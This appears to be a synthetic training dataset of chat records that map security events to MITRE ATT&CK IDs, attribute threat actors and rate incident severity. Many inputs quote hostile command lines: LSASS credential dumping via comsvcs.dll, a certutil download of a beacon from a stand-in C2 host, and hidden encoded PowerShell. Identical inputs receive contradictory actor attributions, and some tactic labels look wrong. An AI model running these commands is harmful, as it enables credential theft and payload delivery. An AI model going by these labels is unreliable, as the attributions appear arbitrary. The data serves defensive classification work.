messages
listlengths
2
2
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windo...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: One of Dtrack can replace the normal flow of a program execution with malicious code.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\", \"TA0005\"], \"techniques\": [\"T1574\"]}", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 504 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 760 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confide...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: APT41 performed password brute-force attacks on the local admin account.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1110\", \"T1110.002\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: A Gamaredon Group file stealer can transfer collected files to a hardcoded C2 server.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1041\"]}", "role": "assistant" ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 766 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confiden...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.185.28.135", "role": "user" }, { "content": "{\"tactics\": [\"TA0040...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"Volt Typ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2786 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.60.237.163", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0009\"], \"t...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.37.68.8", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.006\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3249 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-QHFJVW8CUE)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"sever...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: yty packs a plugin with UPX.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027.002\", \"T1027\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-FD1BYOPXFY)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Reconnaissance, Command and Control", "role": "user" },...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-2WCOKFQ2GU)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Discovery, Initial Access, Persistence", "role": "user" }, { "con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spid...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Kimsuky has downloaded additional scripts, tools, and malware onto victim systems.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Lazarus Group has changed memory protection permissions then overwritten in memory DLL function code with shellcode, which was later executed via KernelCallbackTable hijacking.", "role": "user" }, { "cont...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1312 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The built-in Windows command-line utility Reg may be used for local or remote Registry modification.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1112\"]}", "role"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-SOAZFQIHHV)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Reconnaissance, Discovery", "role": "user" }, { ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.45.207.144", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"T...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-V2XOXBH9LE)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Lateral Movement, Defense Evasion", "role": "user" }...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-S56T4PH4KJ)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"sev...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 516 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confide...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.56.81.228", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0006\"], \"techniques\": ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1475 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.46.171.200", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0002\"], \"t...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for contextual data about a firewall and activity around it such as name, policy, or status", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1518.001\", \"T1518\"]}", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"co...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Gamaredon Group malware has used rundll32 to launch additional malicious components.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.011\"]}", "role":...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: OilRig has also used certutil to decode base64-encoded files on victims.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: looks for net and account or domain in close proximity", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\", \"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-CXV4C971TY)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Execution, Collection", "role": "user" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-PR4JLRAR6C)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \"Crit...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-VPK66UAA3F)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence, Reconnaissance, Privilege Escalation", "role": "user" }, ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Winnti for Linux has decoded XOR encoded strings holding its configuration upon execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1140\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-D6510ILT0O)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Initial Access, Discovery", "role": "user" }, { "co...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"tech...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-VDIPRQMN8Q)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Credential Access, Defense Evasion", "role": "user" }, { "content":...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3471 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.79.196.70", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0006\"], \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-DVEALNGYA2)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"sever...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.37.26.239", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0043\", \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-3TG906T8QO)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Execution, Privilege Escalation", "role": "user" }, { "content":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-CA89XNLV13)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Exfiltration", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\": \"Hig...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.51.25.107", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0040\", \"TA0011\"], \"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 541 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.82.163.47", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0001\"], \"techniques...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Some SeaDuke samples have a module to use pass the ticket with Kerberos for authentication.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0008\"], \"techniques\": [\"T1550.003\", \"T1550\"]}"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: AADInternals can enumerate Azure AD groups.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1069\", \"T1069.003\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Typically, management services over commonly used ports are used when stuffing credentials.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1110.004\", \"T1110\"]}", "role"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1017 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, Base64", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidenc...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Cobalt Strike can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI.", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-14DPCP12VS)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Lateral Movement, Command and Control", "role": "user" ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3831 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.157.54.82", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0006\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1515 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.29.122.122", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0002\", \"TA0009\"],...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-YEH1VP6DJ4)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"High\", \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-PPSW42YJE6)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Cri...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.59.118.136", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\": \"Hig...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.64.78.204", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA00...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: jRAT can map UPnP ports.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1120\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.185.15.248", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2339 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-A03TI81A8H)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Collection, Command and Control, Defense Evasion", "role": "user" ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-Y87IV3VS78)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\": \"Cr...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-DV9RP6H1WM)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: PoisonIvy hides any strings related to its own indicators of compromise.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: ZIRCONIUM has used a tool to enumerate proxy settings in the target environment.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3721 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.16.99.205", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0043\", \...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: ChChes establishes persistence by adding a Registry Run key.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.001\", \"T1547\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-GZXD3SI8NU)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Defense Evasion", "role": "user" }, { "conten...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.1.124.220", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0011\"], \"tech...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Limit the accounts that may use remote services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1564\", \"T1564.007\"]}", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3337 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1639 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Tropic Trooper's backdoor could list the infected system's installed software.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1518\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3425 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.7.160.106", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0003\"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: PowerShell), or other suspicious actions that...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-DSGOCNPB9Q)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Persistence", "role": "user" }, { "content": "{\"s...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-6JU0WN48ZF)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severit...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-MCKKNNQN8B)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Collection, Exfiltration", "role": "user" }, { "content": "{\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 883 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\": \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2023 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidenc...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The login shell then configures the user environment with ~/.zprofile and ~/.zlogin.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546\", \"T1546.004\"]}", "role": "assis...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may gather credentials from information stored in the Proc filesystem or /proc.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.007\"]}", "role": "assistant"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor executed commands and arguments of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of Windows Admin Shares.", "role": "user" }, { "...